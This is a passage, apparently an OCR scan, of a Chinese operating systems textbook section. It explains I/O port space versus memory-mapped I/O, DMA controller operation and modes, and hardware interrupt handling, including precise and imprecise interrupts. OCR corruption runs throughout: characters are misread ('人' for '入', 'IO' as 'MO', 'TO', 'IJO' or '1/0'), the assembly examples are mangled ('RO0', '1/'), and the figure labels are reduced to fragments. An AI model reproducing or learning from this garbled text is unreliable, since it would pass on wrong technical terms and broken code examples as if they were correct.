数据 、 接 收 数据 、 开 启 或 关闭 ， 或 者 执行 某 些 其 他 操作 。 通 过 读 取 这 些 寄存 器 ， 操 作 系 统 可 以 了 解 设备 
的 状态 ， 是 否 准 备 好 接收 一 个 新 的 命令 等 。 

除了 这 些 控制 寄存 器 以 外 ， 许 多 设备 还 有 一 个 操作 系统 可 以 读 写 的 数据 缓冲 区 。 例 如 ， 在 屏幕 上 显 
示 像 素 的 常规 方法 是 使 用 一 个 视频 RAM， 这 一 RAM 基 本 上 只 是 一 个 数据 缓冲 区 ， 可 供 程序 或 操作 系统 
写 人 数据 。 

于 是 , 问题 就 出 现 了 : CPU 如 何 与 设备 的 控制 寄存 器 和 数据 缓冲 区 进行 通信 ? 存在 两 个 可 选 的 方法 。 
在 第 一 个 方法 中 ， 每 个 控制 寄存 器 被 分 配 一 个 IO 端口 (VO port) 号 ， 这 是 一 个 8 位 或 16 位 的 整数 。 所 
有 IO 端口 形成 MO 端口 空间 (IO port space) ， 并 且 受 到 保护 使 得 普通 的 用 户 程序 不 能 对 其 进行 访问 (只 
有 操作 系统 可 以 访问 ) 。 使 用 一 条 特殊 的 IO 指令 ， 例 如 

IN REG, PORT 


CPU 可 以 读 取 控 制 寄存 器 PORT 的 内 容 并 将 结果 存 人 到 CPU 寄存 器 REG 中 。 类 似 地 ， 使 用 
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OUT PORT, REG 
CPU 可 以 将 REG 的 内 容 写 人 到 控制 寄存 器 中 。 大 多 数 早 期 计算 机 ， 包 括 几 乎 所 有 大 型 主机 ， 如 IBM 360 
及 其 所 有 后 续 机 型 ， 都 是 以 这 种 方式 工作 的 。 

在 这 一 方案 中 ， 内 存 地 址 空间 和 IO 地 址 空间 是 不 同 的 ， 如 图 5-2a 所 示 。 指 令 

IN RO0,4 ` 
和 

MOV RO, 4 
在 这 一 设计 中 完全 不 同 。 前 者 读 取 I/O 端 口 4 的 内 容 并 将 其 存 信 R0， 而 后 者 则 读 取 内 存 字 4 的 内 容 并 将 其 
存 人 R0。 因 此 ， 这 些 例子 中 的 4 引用 的 是 不 同 且 不 相关 的 地 址 空间 。 


两 个 地 址 空间 一 个 地 址 空间 两 个 地 址 空间 
OxFFFF.. | 内 存 
/ IO 端口 
o EE E 


a) b) c) 


图 5-2 a) 单独 的 LO 和 内 存 空 间 ; b) 内 存 映 射 TO，<c) 混合 方案 


第 二 个 方法 是 PDP-11 引 入 的 ， 它 将 所 有 控制 寄存 器 映射 到 内 存 空 间 中 ， 如 图 5-2b 所 示 。 每 个 控制 寄 
存 器 被 分 配 唯 一 的 一 个 内 存 地 址 ， 并 且 不 会 有 内 存 被 分 配 这 一 地 址 。 这 样 的 系统 称 为 内 存 映射 1/O 
(memory-mapped IO) 。 在 大 多 数 系统 中 ， 分 配给 控制 寄存 器 的 地 址 位 于 或 者 靠近 地 址 空间 的 顶端 。 图 
5$-2c 所 示 是 一 种 混合 的 方案 ， 这 一 方案 具有 内 存 映射 IO 的 数据 缓冲 区 ， 而 控制 寄存 器 则 具有 单独 的 IO 
端口 。x86 采 用 这 一 体系 结构 。 在 IBM PC 兼容 机 中 ， 除 了 0 到 64K 一 1 的 1/O 端 口 之 外 ，640K 到 1M 一 1 的 内 
存 地 址 保留 给 设备 的 数据 缓冲 区 。 

这 些 方 案 实际 上 是 怎样 工作 的 ? 在 各 种 情形 下 ， 当 CPU 想 要 读 入 一 个 字 的 时 候 ， 不 论 是 从 内 存 中 读 
入 还 是 从 IO 端口 中 读 入 ， 它 都 要 将 需要 的 地 址 放 到 总 线 的 地 址 线 上 ， 然 后 在 总 线 的 一 条 控制 线 上 置 起 
一 个 READ 信 号 。 还 要 用 到 第 二 条 信号 线 来 表明 需要 的 是 1/0 空 间 还 是 内 存 空间 。 如 果 是 内 存 空间 ， 内 存 
将 响应 请 求 。 如 果 是 IO 空间 ，IO 设 备 将 响应 请 求 。 如 果 只 有 内 存 空 间 (如 图 5-2b 所 示 的 情形 )， 那 么 每 
个 内 存 模 块 和 每 个 IO 设备 都 会 将 地 址 线 和 它 所 服务 的 地 址 范围 进行 比较 ， 如 果 地 址 落 在 这 一 范围 之 内 ， 
它 就 会 响应 请 求 。 因 为 绝对 不 会 有 地 址 既 分 配给 内 存 又 分 配给 IO 设备 ， 所 以 不 会 存在 歧义 和 冲突 。 

这 两 种 寻 址 控制 器 的 方案 具有 不 同 的 优 缺 点 。 我 们 首先 来 看 一 看 内 存 映射 IO 的 优点 。 第 一 ， 如 果 
需要 特殊 的 IO 指令 读 写 设备 控制 寄存 器 ， 那 么 访问 这 些 寄存 器 需要 使 用 汇编 代码 ， 因 为 在 C 或 C++ 中 不 
存在 执行 IN 或 OUT 指 令 的 方法 。 调 用 这 样 的 过 程 增加 了 控制 IO 的 开销 。 相 反 ， 对 于 内 存 映 射 JO， 设 备 


”控制 寄存 器 只 是 内 存 中 的 变量 ， 在 C 语 言 中 可 以 和 任何 其 他 变量 一 样 寻 址 。 因 此 ， 对 于 内 存 映射 /O， 


IO 设备 驱动 程序 可 以 完全 用 C 语 言 编写 。 如 果 不 使 用 内 存 映 射 1O， 就 要 用 到 某 些 汇编 代码 。 
第 二 ， 对 于 内 存 映 射 IO ， 不 需要 特殊 的 保护 机 制 来 阻止 用 户 进程 执行 IO 操作 。 操 作 系统 必须 要 做 


的 全 部 事情 只 是 避免 把 包含 控制 寄存 器 的 那 部 分 地 址 空间 放 入 任何 用 户 的 虚拟 地 址 空间 之 中 。 更 为 有 利 
”的 是 ， 如 果 每 个 设备 在 地 址 空间 的 不 同 页 面 上 拥有 自己 的 控制 寄存 器 ， 操 作 系 统 只 要 简单 地 通过 在 其 页 
” 表 中 包含 期 望 的 页 面 就 可 以 让 用 户 控制 特定 的 设备 而 不 是 其 他 设备 。 这 样 的 方案 可 以 使 不 同 的 设备 驱动 


程序 放置 在 不 同 的 地 址 空间 中 ， 不 但 可 以 减 小 内 核 的 大 小 ， 而 且 可 以 防止 驱动 程序 之 间 相 互 干扰 。 

第 三 ， 对 于 内 存 映射 IJO， 可 以 引用 内 存 的 每 一 条 指令 也 可 以 引用 控制 寄存 器 。 例 如 ， 如 果 存 在 一 
条 指令 TEST 可 以 测试 一 个 内 存 字 是 否 为 0， 那 么 它 也 可 以 用 来 测试 一 个 控制 寄存 器 是 否 为 0， 控 制 寄存 
器 为 0 可 以 作为 信号 ， 表 明 设 备 空闲 并 且 可 以 接收 一 条 新 的 命令 。 汇 编 语言 代码 可 能 是 这 样 的 : 
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LOOP: TEST PORT 4 // 检 测 端口 4 是 否 为 0 
BEQ READY // 如 果 为 0， 转 向 READY 
BRANCH LOOP 1/ 否则， 继续 测 试 


READY : 


如 果 不 是 内 存 映射 TO， 那么 必须 首先 将 控制 寄存 器 读 人 CPU ， 然 后 再 测试 ， 这 样 就 需要 两 条 指令 而 不 是 
一 条 。 在 上 面 给 出 的 循环 的 情形 中 ， 就 必须 加 上 第 四 条 指令 ， 这 样 会 稍稍 降低 检测 空闲 设备 的 响应 度 。 

在 计算 机 设计 中 ， 实 际 上 任何 事情 都 要 涉及 权衡 ， 此 处 也 不 例外 。 内 存 映射 IO 也 有 人 缺点。 首先 ， 
现今 大 多 数 计算 机 都 拥有 某 种 形式 的 内 存 字 高 速 缓存 。 对 一 个 设备 控制 寄存 器 进行 高 速 缓存 可 能 是 灾难 
性 的 。 在 存在 高 速 缓存 的 情况 下 考虑 上 面 给 出 的 汇编 代码 循环 。 第 一 次 引用 PORT_4 将 导致 它 被 高 速 组 
存 ， 随 后 的 引用 将 只 从 高 速 缓存 中 取 值 并 且 不 会 再 查询 设备 。 之 后 当 设备 最 终 变 为 就 绪 时 ， 软 件 将 没有 
办 法 发 现 这 一 点 。 结 果 ， 循 环 将 永远 进行 下 去 。 

对 内 存 映 射 TO， 为 了 避免 这 一 情形 ， 硬 件 必 须 能 够 针对 每 个 页 面 有 选择 性 地 禁用 高 速 缓 在。 操作 
系统 必须 管理 选择 性 高 速 缓存 ， 所 以 这 一 特性 为 硬件 和 操作 系统 两 者 增添 了 额外 的 复杂 性 。 

其 次 ， 如 果 只 存在 一 个 地 址 空间 ， 那 么 所 有 的 内 存 模 块 和 所 有 的 IO 设备 都 必须 检查 所 有 的 内 存 引 
用 ， 以 便 了 解 由 谁 做 出 响应 。 如 果 计 算 机 具有 单一 总 线 ， 如 图 $-3a 所 示 ， 那 么 让 每 个 内 存 模块 和 IO 设备 
查看 每 个 地 址 是 简单 易 行 的 。 


CPU 读 写 内存 
转 到 该 高 带宽 总 线 





\ 该 内 存 端口 允许 
所 有 的 内 存 和 IO 地 去 
址 走向 此 处 总 线 IO 设备 访问 内 存 


a) b) 
图 5-3 a) 单 总 线 体系 结构 ;，b) 双 总 线 内 存 体系 结构 


然而 ， 现 代 个 人 计算 机 的 趋势 是 包含 专用 的 高 速 内 存 总 线 ， 如 图 5-3b 所 示 。 装 备 这 一 总 线 是 为 了 优 
化 内 存 性 能 ， 而 不 是 为 了 慢 速 的 IO 设备 而 做 的 折 中 。x86 系 统 甚 至 可 以 有 多 种 总 线 (内 存 、PCle、SCSI 
和 USB)， 如 图 1-12 所 示 。 

在 内 存 映 射 的 机 器 上 具有 单独 的 内 存 总 线 的 麻烦 是 LO 设备 没有 办 法 查看 内 存 地 址 ， 因 为 内 存 地 址 
旁 路 到 内 存 总 线 上 ， 所 以 没有 办 法 响应 。 此 外 ， 必 须 采 取 特 殊 的 措施 使 内 存 映射 IO 工 作 在 具有 多 总 线 
的 系统 上 。 一 种 可 能 的 方法 是 首先 将 全 部 内 存 引用 发 送 到 内 存 ， 如 果 内 存 响应 失败 ，CPU 将 尝试 其 他 总 
线 。 这 一 设计 是 可 以 工作 的 ， 但 是 需要 额外 的 硬件 复杂 性 。 

第 二 种 可 能 的 设计 是 在 内 存 总 线 上 放置 一 个 探查 设备 ， 放 过 所 有 潜在 地 指向 所 关注 的 MO 设备 的 地 
址 。 此 处 的 问题 是 ，1/O 设 备 可 能 无 法 以 内 存 所 能 达到 的 速度 处 理 请 求 。 

第 三 种 可 能 的 设计 是 在 内 存 控制 器 中 对 地 址 进行 过 滤 ， 这 种 设计 很 好 地 与 图 1-12 中 所 描述 的 设计 相 
匹配 。 在 这 种 情形 下 ， 内 存 控 制 器 芯片 中 包含 在 引导 时 预 装 载 的 范围 寄存 器 。 例 如 ，640K 到 1M 一 1 可 能 
被 标记 为 非 内 存 范围 。 落 在 标记 为 非 内 存 的 那些 范围 之 内 的 地 址 将 被 转发 给 设备 而 不 是 内 存 。 这 一 设计 
的 缺点 是 需要 在 引导 时 判定 哪些 内 存 地 址 不 是 真正 的 内 存 地 址 。 因 而 ， 每 一 设计 都 有 支持 它 和 反对 它 的 
论据 ， 所 以 折 中 和 权衡 是 不 可 避免 的 。 


5.1.4 直接 存储 器 存 取 . 

无 论 一 个 CPU 是 否 具 有 内 存 映射 IJO， 它 都 需要 寻 址 设备 控制 器 以 便 与 它们 交换 数据 。CPU 可 以 从 
IO 控制 器 每 次 请 求 一 个 字 节 的 数据 ， 但 是 这 样 做 浪费 CPU 的 时 间 ， 所 以 经 常用 到 一 种 称 为 直接 存储 器 
存 取 (Direct Memory Access, DMA) 的 不 同方 案 。 为 简化 解释 ， 我们 假设 CPU 通 过 单一 的 系统 总 线 访 
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问 所 有 的 设备 和 内 存 ， 该 总 线 连接 CPU、 内 存 和 IO 设备 ， 如 图 5-4 所 示 。 我 们 已 经 知道 在 现代 系统 中 实 
际 的 组 织 要 更 加 复杂 ， 但 是 所 有 的 原理 是 相同 的 。 只 有 硬件 具有 DMA 控 制 器 时 操作 系统 才能 使 用 DMA， 
而 大 多 数 系统 都 有 DMA 控 制 器 。 有 时 DMA 控 制 器 集成 到 磁盘 控制 器 和 其 他 控制 器 之 中 ,但 是 这 样 的 设 
计 要 求 每 个 设备 有 一 个 单独 的 DMA 控 制 器 。 更 加 普遍 的 是 ， 只 有 一 个 DMA 控 制 器 可 利用 (例如 ,在 主板 
上 )， 由 它 调控 到 多 个 设备 的 数据 传送 ， 而 这 些 数据 传送 经 常 是 同时 发 生 的 。 

无 论 DMA 控 制 器 在 物理 上 处 于 什么 地 方 ， 它 都 能 够 独立 于 CPU 而 访问 系统 总 线 ， 如 图 5-4 所 示 。 它 
包含 若干 个 可 以 被 CPU 读 写 的 寄存 器 ， 其 中 包括 一 个 内 存 地 址 寄存 器 、 一 个 字 节 计数 寄存 器 和 一 个 或 多 
个 控制 寄存 器 。 控 制 寄存 器 指定 要 使 用 的 IO 端口 、 传 送 方向 (从 IO 设备 读 或 写 到 IO 设备 ) 、 传 送 单位 
(每 次 一 个 字 节 或 每 次 一 个 字 ) 以 及 在 一 次 突 发 传送 中 要 传送 的 字 节 数 。 


1. CPU 对 DMA g- 驱动 器 
DMA 磁盘 





2.DMA 请 求 传送 
完成 时 中 断 tasty) 3. 数据 传送 | 


— 总 线 


图 5-4 DMA 传 送 操 作 


为 了 解释 DMA 的 工作 原理 ， 让 我 们 首先 看 一 下 没有 使 用 DMA 时 磁盘 如 何 读 。 首 先 ， 控 制 器 从 磁盘 
驱动 器 串 行 地 、 一 位 一 位 地 读 一 个 块 (一 个 或 多 个 遍 区 ) ， 直 到 将 整 块 信息 放 人 控制 器 的 内 部 缓冲 区 中 。 
接着 ， 它 计算 校 验 和 ， 以 保证 没有 读 错 误 发 生 。 然 后 控制 器 产生 一 个 中 断 。 当 操作 系统 开始 运行 时 ， 它 
重复 地 从 控制 器 的 缓冲 区 中 一 次 一 个 字 节 或 一 个 字 地 读 取 该 块 的 信息 ， 并 将 其 存 人 内 存 中 。 

使 用 DMA 时 ， 过 程 是 不 同 的 。 首 先 ，CPU 通 过 设置 DMA 控 制 器 的 寄存 器 对 它 进行 编程 ， 所 以 DMA 
控制 器 知道 将 什么 数据 传送 到 什么 地 方 (图 5-4 中 的 第 1 步 )。DMA 控 制 器 还 要 向 磁盘 控制 器 发 出 一 个 命 
S, 通知 它 从 磁盘 读数 据 到 其 内 部 的 缓冲 区 中 ， 并 且 对 校 验 和 进行 检验 。 如 果 磁 盘 控 制 器 的 缓冲 区 中 的 
数据 是 有 效 的 ， 那 么 DMA 就 可 以 开始 了 。 

DMA 控 制 器 通过 在 总 线 上 发 出 一 个 读 请 求 到 磁盘 控制 器 而 发 起 DMA 传 送 (第 2 步 )。 这 一 读 请 求 看 
起 来 与 任何 其 他 读 请 求 是 一 样 的 ， 并 且 磁 盘 控 制 器 并 不 知道 或 者 并 不 关心 它 是 来 自 CPU 还 是 来 自 DMA 
控制 器 。 一 般 情况 下 ， 要 写 的 内 存 地 址 在 总 线 的 地 址 线 上 ， 所 以 当 磁 盘 控 制 器 从 其 内 部 缓冲 区 中 读 取 下 
一 个 字 的 时 候 ， 它 知道 将 该 字 写 到 什么 地 方 。 写 到 内 存 是 另 一 个 标准 总 线 周期 (第 3 步 )。 当 写 操 作 完 成 
时 ， 磁 盘 控 制 器 在 总 线 上 发 出 一 个 应 答 信 号 到 DMA 控 制 器 (第 4 步 )。 于 是 ，DMA 控 制 器 步 增 要 使 用 的 
内 存 地 址 ， 并 且 步 减 字 节 计 数 。 如 果 字 节 计 数 仍 然 大 于 0， 则 重复 第 2 步 到 第 4 步 ， 直 到 字 节 计数 到 达 0。 
此 时 ，DMA 控 制 器 将 中 断 CPU 以 便 让 CPU 知道 传送 现在 已 经 完成 了 。 当 操作 系统 开始 工作 时 ， 用 不 着 
将 磁盘 块 复制 到 内 存 中 ， 因 为 它 已 经 在 内 存 中 了 。 

DMA 控 制 器 在 复杂 性 方面 的 区 别 相当 大 。 最 简单 的 DMA 控 制 器 每 次 处 理 一 路 传送 ， 如 上 面 所 描述 
的 。 复 杂 一 些 的 DMA 控 制 器 经 过 编程 可 以 一 次 处 理 多 路 传送 ， 这 样 的 控制 器 内 部 具有 多 组 寄存 器 ， 每 
一 通道 一 组 寄存 器 。CPU 通 过 用 与 每 路 传送 相关 的 参数 装载 每 组 寄存 器 开始 。 每 路 传送 必须 使 用 不 同 的 
设备 控制 器 。 在 图 5$-4 中 ， 传 送 每 一 个 字 之 后 ，DMA 控 制 器 要 决定 下 一 次 要 为 哪 一 设备 提供 服务 。DMA 
控制 器 可 能 被 设置 为 使 用 轮转 算法 ， 它 也 可 能 具有 一 个 优先 级 规划 设计 ， 以 便 让 某 些 设备 受到 比 其 他 设 
备 更 多 的 照顾 。 假 如 存在 一 个 明确 的 方法 分 辨 应 答 信号 ， 那 么 在 同一 时 间 就 可 以 挂 起 对 不 同 设备 控制 器 
的 多 个 请 求 。 出 于 这 样 的 原因 ， 经 常 将 总 线 上 不 同 的 应 答 线 用 于 每 一 个 DMA 通 道 。 

许多 总 线 能 够 以 两 种 模式 操作 : 每 次 一 字模 式 和 块 模式 。 某 些 DMA 控 制 器 也 能 够 以 这 两 种 模式 操 
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作 。 在 前 一 个 模式 中 ， 操 作 如 上 所 述 : DMA 控 制 器 请 求 传送 一 个 字 并 且 得 到 这 个 字 。 如 果 CPU 也 想 使 
用 总 线 ， 它 必须 等 待 。 这 一 机 制 称 为 周期 窃取 (cycle stealing) ， 因 为 设备 控制 器 偶尔 偷偷 溜 和 人 并 且 从 
CPU 偷 走 一 个 临时 的 总 线 周 期 ， 从 而 轻微 地 延迟 CPU。 在 块 模式 中 ，DMA 控 制 器 通知 设备 获得 总 线 ， 
发 起 一 连 串 的 传送 ， 然 后 释放 总 线 。 这 一 操作 形式 称 为 突 发 模式 (burst mode) 。 它 比 周期 窃取 效率 更 高 ， 
因为 获得 总 线 占 用 了 时 间 ， 并 且 以 一 次 总 线 获得 的 代价 能 够 传送 多 个 字 。 突 发 模式 的 缺点 是 ， 如 果 正 在 
进行 的 是 长 时 间 突 发 传送 ， 有 可 能 将 CPU 和 其 他 设备 阻塞 相当 长 的 周期 。 

在 我 们 一 直 讨论 的 模型 一 一 有 时 称 为 飞越 模式 (fly-by mode) 中 ，DMA 控 制 器 通知 设备 控制 器 直 
接 将 数据 传送 到 主 存 。 某 些 DMA 控 制 器 使 用 的 其 他 模式 是 让 设备 控制 器 将 字 发 送 给 DMA 控 制 器 ，DMA 
控制 器 然后 发 起 第 2 个 总 线 请 求 将 该 字 写 到 它 应 该 去 的 任何 地 方 。 采 用 这 种 方案 ， 每 传送 一 个 字 需 要 一 
个 额外 的 总 线 周期 ， 但 是 更 加 灵活 ， 因 为 它 可 以 执行 设备 到 设备 的 复制 甚至 是 内 存 到 内 存 的 复制 (通过 
首先 发 起 一 个 到 内 存 的 读 ， 然 后 发 起 一 个 到 不 同 内 存 地 址 的 写 )。 

大 多 数 DMA 控 制 器 使 用 物理 内 存 地 址 进行 传送 。 使 用 物理 地 址 要 求 操作 系统 将 预期 的 内 存 缓冲 区 
的 虚拟 地 址 转换 为 物理 地 址 ， 并 且 将 该 物理 地 址 写 信 DMA 控 制 器 的 地 址 寄存 器 中 。 在 少数 DMA 控 制 器 
中 使 用 的 一 个 替代 方案 是 将 虚拟 地 址 写 人 DMA 控 制 器 ， 然 后 DMA 控 制 器 必须 使 用 MMU 来 完成 虚拟 地 址 
到 物理 地 址 的 转换 。 只 有 在 MMU 是 内 存 的 组 成 部 分 (有 可 能 ， 但 罕见 ) 而 不 是 CPU 的 组 成 部 分 的 情况 
下 , 才 可 以 将 虚拟 地 址 放 到 总 线 上 。 

我 们 在 前 面 提 到 ， 在 DMA 可 以 开始 之 前 ， 磁 盘 首 先 要 将 数据 读 入 其 内 部 的 缓冲 区 中 。 你 也 许 会 产 
生 疑 问 : 为 什么 控制 器 从 磁盘 读 取 字 节 后 不 立即 将 其 存储 在 主 在 中 ? 换 句 话说 ， 为 什么 需要 一 个 内 部 缓 
冲 区 ? 有 两 个 原因 。 首 先 ， 通 过 进行 内 部 缓冲 ， 磁 盘 控 制 器 可 以 在 开始 传送 之 前 检验 校 验 和 。 如 果 校 验 
和 是 错误 的 ， 那 么 将 发 出 一 个 表明 错误 的 信号 并 且 不 会 进行 传送 。 

第 二 个 原因 是 ， 一 旦 磁盘 传送 开始 工作 ， 从 磁盘 读 出 的 数据 就 是 以 固定 速率 到 达 的 ， 而 不 论 控制 器 
是 否 准备 好 接收 数据 。 如 果 控 制 器 要 将 数据 直接 写 到 内 存 ， 则 它 必 须 为 要 传送 的 每 个 字 取得 系统 总 线 的 
控制 权 。 此 时 ， 若 由 于 其 他 设备 使 用 总 线 而 导致 总 线 忙 (例如 在 突 发 模式 中 )， 则 控制 器 只 能 等 待 。 如 
果 在 前 一 个 磁盘 字 还 未 被 存储 之 前 下 一 个 磁盘 字 到 达 ， 控 制 器 只 能 将 它 存放 在 某 个 地 方 。 如 果 总 线 非常 
忙 ， 控 制 器 可 能 需要 存储 很 多 字 ， 而 且 还 要 完成 大 量 的 管理 工作 。 如 果 块 被 放 入 内 部 缓冲 区 ， 则 在 
DMA 启 动 前 不 需要 使 用 总 线 ， 这 样 ， 控 制 器 的 设计 就 可 以 简化 ， 因 为 对 DMA 到 内 存 的 传送 没有 严格 的 
时 间 要 求 。( 事 实 上 ， 有 些 老式 的 控制 器 是 直接 存 取 内 存 的 ， 其 内 部 缓冲 区 设计 得 很 小 ， 但 是 当 总 线 很 
忙 时 ， 一些 传 送 有 可 能 由 于 超载 运行 错误 而 被 终止 。) 

并 不 是 所 有 的 计算 机 都 使 用 DMA。 反 对 的 论据 是 主 CPU 通 常 要 比 DMA 控 制 器 快 得 多 ， 做 同样 的 工 
作 可 以 更 快 〈 当 限制 因素 不 是 IO 设备 的 速度 时 )。 如 果 CPU 没 有 其 他 工作 要 做 ， 让 (快速 的 ) CPU 等 待 
( 慢 速 的 ) DMA 控 制 器 完成 工作 是 无 意义 的 。 此 外 ， 去 除 DMA 控 制 器 而 让 CPU 用 软件 做 所 有 的 工作 还 可 
以 节约 金钱 ， 这 一 点 在 低 端 (嵌入 式 ) 计算 机 上 十 分 重要 。 
5.1.5 重 温 中 断 

我 们 在 1.3.4 节 中 简要 介绍 了 中 断 ， 但 是 还 有 更 多 的 内 容 要 介绍 。 在 一 台 典 型 的 个 人 计算 机 系统 中 ， 
中 断 结 构 如 图 5-5 所 示 。 在 硬件 层面 ， 中 断 的 工作 如 下 所 述 。 当 一 个 IO 设备 完成 交 给 它 的 工作 时 ， 它 就 
产生 一 个 中 断 〈 假 设 操作 系统 已 经 开放 中 断 ) ， 它 是 通过 在 分 配给 它 的 一 条 总 线 信 号 线 上 置 起 信号 而 产 
生 中 断 的 。 该 信号 被 主板 上 的 中 断 控制 器 芯片 检测 到 ， 由 中 断 控制 器 芯片 决定 做 什么 。 


1. 设备 完成 工作 









3.CPU 响 应。 中断 控制 器 








2 .中断 控制 器 = 
D 发 出 中 断 Ne 
x. 
总 线 


图 5-5 中 断 是 怎样 发 生 的 。 设 备 与 中 断 控制 器 之 间 的 连接 实际 上 使 用 的 是 总 线 上 的 中 断 线 而 不 是 专用 连 线 
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如 果 没 有 其 他 中 断 悬 而 未 决 ， 中 断 控制 器 将 立刻 对 中 断 进 行 处 理 。 如 果 有 另 一 个 中 断 正在 处 理 中 ， 
或 者 另 一 个 设备 在 总 线 上 具有 更 高 优先 级 的 一 条 中 断 请 求 线 上 同时 发 出 中 断 请 求 ， 该 设备 将 暂时 不 被 理 
竖 。 在 这 种 情况 下 ， 该 设备 将 继续 在 总 线 上 置 起 中 断 信号 ， 直 到 得 到 CPU 的 服务 。 

为 了 处 理 中 断 ， 中 断 控制 器 在 地 址 线 上 放置 一 个 数字 表明 哪个 设备 需要 关注 ， 并 且 置 起 一 个 中 断 
CPU 的 信号 。 

中 断 信 号 导致 CPU 停止 当前 正在 做 的 工作 并 且 开 始 做 其 他 的 事情 。 地 址 线 上 的 数字 被 用 做 指向 一 个 
称 为 中 断 向 量 (interrupt vector) 的 表格 的 索引 ， 以 便 读 取 一 个 新 的 程序 计数 器 。 这 一 程序 计数 器 指向 
相应 的 中 断 服务 过 程 的 开始 。 一 般 情况 下 ， 陷 阱 和 中 断 从 这 一 点 上 看 使 用 相同 的 机 制 ， 并 且 常 常 共 享 相 
同 的 中 断 向 量 。 中 断 向 量 的 位 置 可 以 硬 布线 到 机 器 中 ， 也 可 以 在 内 存 中 的 任何 地 方 通过 一 个 CPU 寄 存 器 
(由 操作 系统 装载 ) 指向 其 起 点 。 

中 断 服务 过 程 开始 运行 后 ， 它 立刻 通过 将 一 个 确定 的 值 写 到 中 断 控 制 器 的 某 个 IO 端口 来 对 中 断 做 
出 应 答 。 这 一 应 答 告诉 中 断 控制 器 可 以 自由 地 发 出 男 一 个 中 断 。 通 过 让 CPU 延迟 这 一 应 答 直到 它 准 备 好 
处 理 下 一 个 中 断 ， 就 可 以 避免 与 多 个 几乎 同时 发 生 的 中 断 相 牵 涉 的 竞争 状态 。 说 句 题 外 的 话 ， 某 些 ( 老 
式 的 ) 计算 机 没有 集中 的 中 断 控制 器 ， 所 以 每 个 设备 控制 器 请 求 自己 的 中 断 。 

在 开始 服务 程序 之 前 ， 硬 件 总 是 要 保存 一 定 的 信息 。 哪 些 信息 要 保存 以 及 将 其 保存 到 什么 地 方 ， 不 
同 的 CPU 之 间 存 在 巨大 的 差别 。 作 为 最 低 限 度 ， 必 须 保存 程序 计数 器 ， 这 样 被 中 断 的 进程 才能 够 重新 开 
始 。 在 另 一 个 极端 ， 所 有 可 见 的 寄存 器 和 很 多 内 部 寄存 器 或 许 也 要 保存 。 

将 这 些 信息 保存 到 什么 地 方 是 一 个 问题 。 一 种 选择 是 将 其 放 入 内 部 寄存 器 中 ， 在 需要 时 操作 系统 可 
以 读 出 这 些 内 部 寄存 器 。 这 一 方法 的 问题 是 ， 中 断 控制 器 之 后 无 法 得 到 应 答 ， 直 到 所 有 可 能 的 相关 信息 
被 读 出 ， 以 免 第 二 个 中 断 重 写 内 部 寄存 器 保存 状态 。 这 一 策略 在 中 断 被 禁止 时 将 导致 长 时 间 的 死机 ， 并 
且 可 能 丢失 中 断 和 丢失 数据 。 

因此 ， 大 多 数 CPU 在 堆栈 中 保存 信息 。 然 而 ， 这 种 方法 也 有 问题 。 首 先 ， 使 用 谁 的 堆栈 ? 如果 使 用 
当前 堆栈 ， 则 它 很 可 能 是 用 户 进程 的 堆栈 。 堆 栈 指针 甚至 可 能 不 是 合法 的 ， 这 样 当 硬 件 试图 在 它 所 指 的 
地 址 处 写 某 些 字 时 ， 将 导致 致命 错误 。 此 外 ， 它 可 能 指向 一 个 页 面 的 末端 。 若 干 次 内 存 写 之 后 ， 页 面 边 
界 可 能 被 超出 并 且 产 生 一 个 页 面 故障 。 在 硬件 中 断 处 理 期 间 如 果 发 生 页 面 故 障 将 引起 更 大 的 问题 : 在 何 
处 保存 状态 以 处 理 页 面 故 障 ? 

如 果 使 用 内 核 堆 栈 ， 堆栈 指针 是 合法 的 并 且 指 向 一 个 固定 的 页 面 , 这 样 的 机 会 将 会 更 大 一 些 。 然 而 ， 
切换 到 核心 态 可 能 要 求 改变 MMU 上 下 文 ， 并 且 可 能 使 高 速 缓 存 和 TLB 的 大 部 分 或 全 部 失效 。 静 态 地 或 
动态 地 重新 装载 所 有 这 些 东 西 将 增加 处 理 一 个 中 断 的 时 间 ， 因 而 浪费 CPU 的 时 间 。 

精确 中 断 和 不 精确 中 断 

另 一 个 问题 是 由 下 面 这 样 的 事实 引起 的 : 现代 CPU 大 量 地 采用 流水 线 并 且 有 时 还 采用 超标 量 (内 部 
并 行 )。 在 老式 的 系统 中 ， 每 条 指令 完成 执行 之 后 ， 微 程序 或 硬件 将 检查 是 否 存在 悬而未决 的 中 断 。 如 
果 存 在 ， 那 么 程序 计数 器 和 PSW 将 被 压 入 堆栈 中 而 中 断 序列 将 开始 。 在 中 断 处 理 程序 运行 之 后 ， 相 反 的 
过 程 将 会 发 生 ， 旧 的 PSW 和 程序 计数 器 将 从 堆栈 中 弹出 并 且 先 前 的 进程 继续 运行 。 

这 一 模型 使 用 了 隐 含 的 假设 ， 这 就 是 如 果 一 个 中 断 正 好 在 某 一 指令 之 后 发 生 ， 那 么 这 条 指令 前 的 所 
有 指令 (包括 这 条 指令 ) 都 完整 地 执行 过 了 ， 而 这 条 指令 后 的 指令 一 条 也 没有 执行 。 在 老式 的 机 器 上 ， 
这 一 假设 总 是 正确 的 ， 而 在 现代 计算 机 上 ， 这 一 假设 则 未 必 是 正确 的 。 

首先 ， 考 虑 图 1-6a 的 流水 线 模型 。 在 流水 线 满 的 时 候 (通常 的 情形 )， 如 果 出 现 一 个 中 断 ， 那 么 会 
| 发生 什 么 情况 ? 许多 指令 正 处 于 各 种 不 同 的 执行 阶段 ， 当 中 断 出 现时 ， 程 序 计数 器 的 值 可 能 无 法 正确 地 
反映 已 经 执行 过 的 指令 和 尚未 执行 的 指令 之 间 的 边界 。 事 实 上 ， 许 多 指令 可 能 部 分 地 执行 了 ， 不 同 的 指 
令 完成 的 程度 或 多 或 少 。 在 这 种 情况 下 ， 程 序 计 数 器 更 有 可 能 反映 的 是 将 要 被 取出 并 压 人 流水 线 的 下 一 
条 指令 的 地 址 ， 而 不 是 刚刚 被 执行 单元 处 理 过 的 指令 的 地 址 。 

在 如 图 1-7b 所 示 的 超标 量 计 算 机 上 ， 事 情 更 加 精 糕 。 指 令 可 能 分 解 成 微 操 作 ， 而 微 操 作 有 可 能 乱 序 
执行 ， 这 取决 于 内 部 资源 (如 功能 单元 和 寄存 器 ) 的 可 用 性 。 当 中 断 发 生 时 ， 某 些 很 久 以 前 启动 的 指令 
可 能 还 没 开始 执行 ， 而 其 他 最 近 启 动 的 指令 可 能 几乎 要 完成 了 。 当 中 断 信 号 出 现时 ， 可 能 存在 许多 指令 
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处 于 不 同 的 完成 状态 ， 它 们 与 程序 计数 器 之 间 没 有 什么 关系 。 

